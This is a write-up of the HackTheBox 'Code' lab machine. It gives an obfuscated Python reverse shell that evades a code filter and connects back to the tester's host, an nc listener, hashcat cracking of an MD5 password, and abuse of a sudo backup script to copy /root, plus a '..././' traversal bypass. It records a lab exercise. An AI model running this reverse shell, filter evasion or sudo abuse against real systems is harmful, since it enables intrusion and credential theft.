- Difficulty: Easy
- Target: HackTheBox [Code]
- Type: Comprehensive Penetration
GetShell#
First, obtain the IP, scan the ports, and find that 22
and 5000
are open. It turns out that 5000
is an HTTP service, and upon accessing it, I discovered that Python code can be executed directly, although some dangerous functions are filtered.
I directly used getattr
to bypass and spawn a shell, first starting nc
to listen.
nc -lv 9443
Then, running the following code will allow for a reverse shell.
o_s = getattr(print.__self__, '__im' + 'port__')('o' + 's')
so = getattr(print.__self__, '__im' + 'port__')('soc' + 'ket')
sub = getattr(print.__self__, '__im' + 'port__')('subpro' + 'cess')
s=so.socket(so.AF_INET,so.SOCK_STREAM);
s.connect(('10.10.14.45',9443));
o_s.dup2(s.fileno(),0);
o_s.dup2(s.fileno(),1);
o_s.dup2(s.fileno(),2);
p=sub.call(['/bin/bash','-i']);
After obtaining the shell, I found an SQLite database named database.db
. It contained two users, and I found the MD5 hashed username and password. Comparing with /etc/passwd
, I discovered that the user martin
exists, so I could crack the password and attempt to brute-force SSH.
Using HashCat to crack the password.
hashcat -m 0 martin.hash rockyou.txt
Successfully cracked the password and logged into SSH. At this point, GetShell was successful.
Privilege Escalation#
Actually, my approach to privilege escalation had some issues; I was only able to access all files under /root
, including the flag file, but I did not truly escalate to root. I will note this down.
First, I used ssh -l
to check the executable privileged commands and found a /usr/bin/backy.sh
.
Upon inspecting its contents, I found that it performs a series of filtering processes on the input $json_file
, then hands it over to the binary program backy
.
I found the source code for backy on GitHub. Analyzing the source code, I discovered that it actually calls the rsync
and tar
commands to back up folders, and rsync
accepts directories_to_sync
from the JSON file as the source path for synchronization.
The /usr/bin/backy.sh
only controls the directories_to_archive
parameter processed by tar
, so I could construct an attack chain like this: first, synchronize the /root
folder to the user directory using rsync
. The synchronized folder can only be accessed by the root user, so I could then use backy
to tar the synchronized folder, and finally download and extract it to see its contents.
First, modify the task.json
file.
{
"destination": "/home/martin/root",
"multiprocessing": true,
"verbose_log": false,
"directories_to_sync": [
"/root"
]
}
Then execute sudo backy.sh task.json
, at which point the contents of /root
will be synchronized to /home/martin/root
, and then modify the task.json
file.
{
"destination": "/home/martin/backup",
"multiprocessing": true,
"verbose_log": false,
"directories_to_archive": [
"/home/martin/root"
]
}
Execute sudo backy.sh task.json
, and you will find the compressed file in /home/martin/backup
, extracting it will yield the root flag.
However, there is a very obvious problem with this approach: rsync
does not synchronize hidden folders like .ssh
, so I cannot escalate to root. Later, I saw other people's WriteUp and found that it was necessary to bypass ../
using double writing, such as ..././
. In any case, the challenge was still very interesting.